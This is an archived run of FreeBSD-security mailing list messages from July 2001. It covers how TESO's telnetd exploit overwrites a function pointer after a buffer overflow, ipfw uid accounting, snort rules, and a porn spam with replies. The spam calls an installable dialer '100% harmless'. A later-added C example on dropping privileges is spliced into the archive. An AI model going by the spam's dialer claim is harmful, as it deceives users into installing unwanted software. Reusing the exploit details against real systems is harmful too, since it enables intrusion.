The "regular" telnetd still has the overflow (which may or may not be exploitable) but the posted exploit by TESO targets encrypting versions that have the encrypt_output function pointer in the BSS after netobuf.
The function pointer gets overwritten when netobuf overflows and that is the basis of the exploit. The regular telnetd (if that's the one you installed) doesn't have any such function pointer to exploit and thus isn't vulnerable to this particular exploit by TESO. Like I said though, the overflow is still present and it may or may not be exploitable by other means.

Paul Hart

--
Paul Robert Hart        hart@orem.verio.net
Jul ner lbh ernqvat guvf?

From owner-freebsd-security Fri Jul 27 20:30:34 2001
Date: Fri, 27 Jul 2001 20:30:22 -0700
From: Gary Kline
To: Kris Kennaway
Cc: Gary Kline, security@freebsd.org
Subject: Re: New windowmaker install bombs...
Message-ID: <20010727203021.A38510@tao.thought.org>
In-Reply-To: <20010727195206.A58147@xor.obsecurity.org>
X-Of_Interest: Observing 15 years of service to the Unix community
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Fri, Jul 27, 2001 at 07:52:06PM -0700, Kris Kennaway wrote:
> On Fri, Jul 27, 2001 at 05:44:18PM -0700, Gary Kline wrote:
> >
> > Please excuse the slight OT note, but this is to
> > whomever put up the latest windowmaker version. Because
> > I'm going to run it on my DNS server--outside my firewall--I
> > dropped in the new port virtually at once. It builds, but
> > bombs with the make install. Maybe a bad patch... (?)
> >
> > Anyway, this heads-up to anyone who is considering up-
> > revving.
>
> This should have gone to -ports.
>

Arrgh, I was thinking security@freebsd.org and typed stable@freebsd.org
instead. Agree that the original post (and this) should have gone to
-ports. But I was happy to follow it as a -security issue. Anyway, I'm
cc'ing this back there.

gary

--
Gary D. Kline kline@thought.org www.thought.org Public service Unix

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Jul 27 20:43: 4 2001
Delivered-To: freebsd-security@freebsd.org
Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with ESMTP id 82D7237B403 for ; Fri, 27 Jul 2001 20:43:01 -0700 (PDT) (envelope-from silby@silby.com)
Received: (qmail 43863 invoked by uid 1000); 28 Jul 2001 03:43:00 -0000
Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 28 Jul 2001 03:43:00 -0000
Date: Fri, 27 Jul 2001 22:43:00 -0500 (CDT)
From: Mike Silbersack
To: "Nickolay A.Kritsky"
Cc:
Subject: Re[2]: accounting with ipfw (gid, uid rules)
In-Reply-To: <15993079421.20010727191853@internethelp.ru>
Message-ID: <20010727223026.D43808-100000@achilles.silby.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Fri, 27 Jul 2001, Nickolay A.Kritsky wrote:

> do you mean that after this code:
> //----------------------------------------------------------------
> setuid(0);
> s=socket(...);
> listen(s,1);
> if (fork()!=-1)
> {
>     setuid(1);
>     k=accept(s);
> }
> //----------------------------------------------------------------
> socket pointed by k will be "owned" by root?

Yes.

> Anyway, it is not the main point of my question. Accounting httpd
> traffic is just a piece of cake - the port is fixed, the address is
> fixed. But I wanted to count Squid traffic. AFAIK Squid does not do any
> setuid() voodoo, except for the privilege drop at startup. After that it
> runs strictly as uid 'nobody'. But squid's traffic doesn't hit the
> counter!!! I wonder why. Maybe it is because of natd running on the outer
> interface? But why then do some packets hit the counter?

If squid runs the listen as root, all sockets created from that listen
socket will also be accounted to root. Same problem as the above.

I do not know how natd would affect connections in terms of uid
accounting.

Bug Robert Watson about this, the uid accounting is related to the
jail/acl/mac/etc stuff which he has / will be working on. He could tell
you if the uid can be changed at the accept handoff or not.

> Sorry, but what does FWIW mean?

"For what it's worth"

Mike "Silby" Silbersack

From owner-freebsd-security Sat Jul 28 2: 8:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from pa169.kurdwanowa.sdi.tpnet.pl (pa169.kurdwanowa.sdi.tpnet.pl [213.77.148.169]) by hub.freebsd.org (Postfix) with ESMTP id 3D34337B403 for ; Sat, 28 Jul 2001 02:08:16 -0700 (PDT) (envelope-from kzaraska@student.uci.agh.edu.pl)
Received: by pa169.kurdwanowa.sdi.tpnet.pl (Postfix, from userid 1001) id D209A1C67; Sat, 28 Jul 2001 11:08:00 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1]) by pa169.kurdwanowa.sdi.tpnet.pl (Postfix) with ESMTP id 8A7455480 for ; Sat, 28 Jul 2001 11:08:00 +0200 (CEST)
Date: Sat, 28 Jul 2001 11:08:00 +0200 (CEST)
From: Krzysztof Zaraska
X-Sender: kzaraska@lhotse.zaraska.dhs.org
To: freebsd-security@freebsd.org
Subject: telnetd exploit snort rules
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

For those of you running snort, the rules for the telnetd exploit are
available from www.snort.org.
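The ipfw accounting exchange above (Nickolay's snippet and Mike's reply) comes down to ordering: the snippet creates the listening socket as root and only calls setuid() in the forked child, so, per Mike's explanation, every accept()ed socket is credited to root and never matches a uid rule for the unprivileged user. The following is an added example, not code from the thread or from Squid, showing the other order: drop privileges irrevocably first, verify the drop, and only then create the listener, so the accepted sockets are created by the unprivileged uid. The function names (drop_privileges, make_listener, start_unprivileged_listener, bound_port) and the uid 65534 used for "nobody" are assumptions for this illustration; the behaviour it relies on (accepted sockets inherit the uid that created the listener) is taken from Mike's reply, not verified here.

```c
/* Added example for the ipfw uid-accounting thread; not from the original
 * post or from Squid. Assumed helper names throughout. */
#include <arpa/inet.h>
#include <grp.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Irrevocably switch to uid/gid and verify that the switch took effect.
 * Returns 0 on success, -1 on failure. */
int drop_privileges(uid_t uid, gid_t gid)
{
    /* Supplementary groups can only be cleared by root; an unprivileged
     * caller keeps whatever it already has. */
    if (geteuid() == 0 && setgroups(0, NULL) != 0)
        return -1;
    /* gid first: once we are no longer root, setgid() would fail. */
    if (setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    /* Real and effective ids must both match the target. */
    if (getuid() != uid || geteuid() != uid ||
        getgid() != gid || getegid() != gid)
        return -1;
    /* If root can be regained, the saved uid was left at 0: not a real drop. */
    if (uid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

/* TCP listener bound to 127.0.0.1:port (port 0 = ephemeral, handy for tests).
 * Returns the fd or -1. */
int make_listener(uint16_t port)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    int one = 1;
    setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
    struct sockaddr_in sin;
    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(port);
    sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    if (bind(fd, (struct sockaddr *)&sin, sizeof sin) != 0 ||
        listen(fd, 16) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Port the listener actually got (useful when 0 was requested), or -1. */
int bound_port(int fd)
{
    struct sockaddr_in sin;
    socklen_t len = sizeof sin;
    if (getsockname(fd, (struct sockaddr *)&sin, &len) != 0)
        return -1;
    return ntohs(sin.sin_port);
}

/* The order that matters for uid accounting: drop first, then listen.
 * The snippet in the thread does the reverse (listen as root, setuid in the
 * child), which is why its accept()ed sockets are credited to root.
 * This only works for ports >= 1024; a privileged port has to be bound
 * while still root, and then the problem Mike describes stands. */
int start_unprivileged_listener(uid_t uid, gid_t gid, uint16_t port)
{
    if (drop_privileges(uid, gid) != 0)
        return -1;
    return make_listener(port);
}

int main(void)
{
    /* As root: drop to 65534 (assumed to be "nobody"). Unprivileged: "drop"
     * to our own ids, which is permitted and exercises the same path. */
    uid_t uid = getuid() == 0 ? (uid_t)65534 : getuid();
    gid_t gid = getgid() == 0 ? (gid_t)65534 : getgid();
    int fd = start_unprivileged_listener(uid, gid, 3128); /* Squid's default port */
    if (fd < 0) {
        perror("start_unprivileged_listener");
        return 1;
    }
    printf("uid %u listening on 127.0.0.1:%d\n",
           (unsigned)geteuid(), bound_port(fd));
    /* accept() loop would go here; sockets are now created by the dropped uid. */
    close(fd);
    return 0;
}
```

The check at the end of drop_privileges (trying setuid(0) again) is the part worth keeping even if the rest is replaced: a drop that leaves the saved uid at 0 looks identical in ps but is trivially reversible, and a daemon that believes it dropped root when it did not is exactly the case where the accounting rules and the security boundary both quietly fail.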
From owner-freebsd-security Sat Jul 28 4:25:53 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mydomain.com (t3o102p2.telia.com [194.255.255.2]) by hub.freebsd.org (Postfix) with ESMTP id D0F8237B406; Sat, 28 Jul 2001 04:25:41 -0700 (PDT) (envelope-from world1web@www.com)
Date: Sat, 28 Jul 2001 13:25:40 +0100
From: WORLD1-WEB
To: WORLD1-WEB@FreeBSD.ORG
Subject: INCREDIBLE .. WORLDS NO.1 !!
Message-Id: <20010728112541.D0F8237B406@hub.freebsd.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Ladies & Gentlemen,

Are you ready for the experience of a lifetime?

As affiliates of the CIL group, we offer you to PLUGIN to the largest SEX-SERVER on the WEB, in order to get more than 3000 MegaBytes of the best and most sensational SEX on the entire Web!

Why on earth do you think that thousands of people from 13 countries daily choose to visit 2 particular WebSites?

Very EASY answer!

- The largest and most incredible content of LIVE SEX is offered!
- State-of-the-art LIVE SHOWS with the wildest and most horny amateurs and pornstars in the world!
- Hardcore LIVE SEX that hasn't crossed your imagination!
- Incredible & amazing themes from soft sex to the most bizarre sex!
- Beautiful Girls & wild studs from almost every country, allowing you to watch, see & chat with awesome amateurs & pornstars who are blond, who are black, who are Scandinavian, who are Asian, who have BIG tits, who are shaved, who are pregnant, who are .... you just name it!
- The best ever made SPY-CAMS, WATCH-CAMS, POOL-CAMS, SHOWER-CAMS, AMATEUR-CAMS ... etc!
- Several high quality Interactive Cams & LIVE SEX Chat, where you are in control!
- Much much more ... too much to mention!

EVERYTHING is offered 100% ANONYMOUSLY & you don't need to sign up or have a credit card ... How simple is that?

PLUGIN now to our MEGA SEX-SERVER through any of the 2 AwardWinning Sites listed below, and get instant access to more than 3000 MegaBytes of State-of-the-art WebSex!

RIGHT HERE AT:

http://siam.to/sexywebtv (This Site just has EVERYTHING you can imagine) ... If this Site does not open properly ... please try
http://cyberu.to/hotweb

Or this one, if you just love true LESBIAN SEX, CHAT and MORE from Sunny Ibiza in Spain:

http://siam.to/sexybabestv ... If this Site does not open properly ... please try http://cyberu.to/hotbabes

Enjoy your trip to paradise!

VERY IMPORTANT HINT:
To get DIRECT ACCESS to the webpages in the future, ALWAYS keep the DIALER on your desktop or elsewhere on your PC ... It's easy, small and 100% harmless.

Yours sincerely,
WORLD1-WEB

From owner-freebsd-security Sat Jul 28 5: 3:50 2001
Delivered-To: freebsd-security@freebsd.org
Received: from I-Sphere.COM (shell.i-sphere.com [209.249.146.70]) by hub.freebsd.org (Postfix) with ESMTP id 78D6B37B403 for ; Sat, 28 Jul 2001 05:03:47 -0700 (PDT) (envelope-from fasty@I-Sphere.COM)
Received: (from fasty@localhost) by I-Sphere.COM (8.11.4/8.11.4) id f6SC9Pm02378; Sat, 28 Jul 2001 05:09:25 -0700 (PDT) (envelope-from fasty)
Date: Sat, 28 Jul 2001 05:09:25 -0700
From: faSty
To: WORLD1-WEB
Cc: freebsd-security@freebsd.org
Subject: Re: INCREDIBLE .. WORLDS NO.1 !!
Message-ID: <20010728050925.A2363@i-sphere.com>
References: <20010728112541.D0F8237B406@hub.freebsd.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010728112541.D0F8237B406@hub.freebsd.org>; from world1web@www.com on Sat, Jul 28, 2001 at 01:25:40PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

oh crap another spam...

-trev

On Sat, Jul 28, 2001 at 01:25:40PM +0100, WORLD1-WEB wrote:
> Ladies & Gentlemen,
>
> Are you ready for the experience of a lifetime?
>
> As affiliates of the CIL group, we offer you to PLUGIN to the largest SEX-SERVER on the WEB, in order to get more than 3000 MegaBytes of the best and most sensational SEX on the entire Web!
>
> Why on earth do you think that thousands of people from 13 countries daily choose to visit 2 particular WebSites?
>
> Very EASY answer!
>
> - The largest and most incredible content of LIVE SEX is offered!
> - State-of-the-art LIVE SHOWS with the wildest and most horny amateurs and pornstars in the world!
> - Hardcore LIVE SEX that hasn't crossed your imagination!
> - Incredible & amazing themes from soft sex to the most bizarre sex!
> - Beautiful Girls & wild studs from almost every country, allowing you to watch, see & chat with awesome amateurs & pornstars who are blond, who are black, who are Scandinavian, who are Asian, who have BIG tits, who are shaved, who are pregnant, who are .... you just name it!
> - The best ever made SPY-CAMS, WATCH-CAMS, POOL-CAMS, SHOWER-CAMS, AMATEUR-CAMS ... etc!
> - Several high quality Interactive Cams & LIVE SEX Chat, where you are in control!
> - Much much more ... too much to mention!
>
> EVERYTHING is offered 100% ANONYMOUSLY & you don't need to sign up or have a credit card ... How simple is that?
>
> PLUGIN now to our MEGA SEX-SERVER through any of the 2 AwardWinning Sites listed below, and get instant access to more than 3000 MegaBytes of State-of-the-art WebSex!
>
> RIGHT HERE AT:
>
> http://siam.to/sexywebtv (This Site just has EVERYTHING you can imagine) ... If this Site does not open properly ... please try
> http://cyberu.to/hotweb
>
> Or this one, if you just love true LESBIAN SEX, CHAT and MORE from Sunny Ibiza in Spain:
>
> http://siam.to/sexybabestv ... If this Site does not open properly ... please try http://cyberu.to/hotbabes
>
>
>
> Enjoy your trip to paradise!
>
> VERY IMPORTANT HINT:
> To get DIRECT ACCESS to the webpages in the future, ALWAYS keep the DIALER on your desktop or elsewhere on your PC ... It's easy, small and 100% harmless.
>
> Yours sincerely,
> WORLD1-WEB
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

--
In Lexington, Kentucky, it's illegal to carry an ice cream cone in your pocket.

From owner-freebsd-security Sat Jul 28 5:48: 0 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ringworld.nanolink.com (discworld.nanolink.com [195.24.48.189]) by hub.freebsd.org (Postfix) with SMTP id 9C1AB37B405 for ; Sat, 28 Jul 2001 05:47:56 -0700 (PDT) (envelope-from roam@orbitel.bg)
Received: (qmail 2009 invoked by uid 1000); 28 Jul 2001 12:46:58 -0000
Date: Sat, 28 Jul 2001 15:46:58 +0300
From: Peter Pentchev
To: faSty
Cc: freebsd-security@freebsd.org
Subject: Re: INCREDIBLE .. WORLDS NO.1 !!
Message-ID: <20010728154658.A1249@ringworld.oblivion.bg>
Mail-Followup-To: faSty , freebsd-security@freebsd.org
References: <20010728112541.D0F8237B406@hub.freebsd.org> <20010728050925.A2363@i-sphere.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010728050925.A2363@i-sphere.com>; from fasty@i-sphere.com on Sat, Jul 28, 2001 at 05:09:25AM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Sat, Jul 28, 2001 at 05:09:25AM -0700, faSty wrote:
> oh crap another spam...

Look. Don't reply to the sender address of spam messages. This only
lets them know that there really is a live person reading mail sent to
that address, and makes them add the address (in this case, both
freebsd-security and yours) to their lists for future spam mailings.

G'luck,
Peter

--
This sentence is false.

From owner-freebsd-security Sat Jul 28 6:19: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 4691837B401 for ; Sat, 28 Jul 2001 06:19:06 -0700 (PDT) (envelope-from jwyatt@rwsystems.net)
Received: from bsdie.rwsystems.net([209.197.223.2]) (1709 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Sat, 28 Jul 2001 08:17:45 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25)
Date: Sat, 28 Jul 2001 08:17:45 -0500 (CDT)
From: James Wyatt
To: faSty
Cc: freebsd-security@freebsd.org
Subject: Re: INCREDIBLE .. WORLDS NO.1 !!
In-Reply-To: <20010728050925.A2363@i-sphere.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Sat, 28 Jul 2001, faSty wrote:

> Date: Sat, 28 Jul 2001 05:09:25 -0700
> From: faSty
> To: WORLD1-WEB
> Cc: freebsd-security@freebsd.org
> Subject: Re: INCREDIBLE .. WORLDS NO.1 !!
>
> oh crap another spam...
>
> -trev
>
> On Sat, Jul 28, 2001 at 01:25:40PM +0100, WORLD1-WEB wrote:
> > Ladies & Gentlemen,
> >
> > Are you ready for the experience of a lifetime?
> >
> > As affiliates of the CIL group, we offer you to PLUGIN to the largest SEX-SERVER on the WEB, in order to get more than 3000 MegaBytes of the best and most sensational SEX on the entire Web!

1) Did you *have* to include the spammer in the replies? (The address
appears valid since www.com provides email accounts. Let us know if you
get a bounce and you get off the hook for this one.) They now know the
FreeBSD address is valid. (and how to unsubscribe (^_^)

2) Did you *have* to include the whole stinking thing AGAIN?

3) I like to counter Spam with information. Here is a URL for an
interesting study of Spam and what encourages it:
http://www.cnet.com/software/0-3227888-8-6602372-1.html

Hope this helps... - Jy@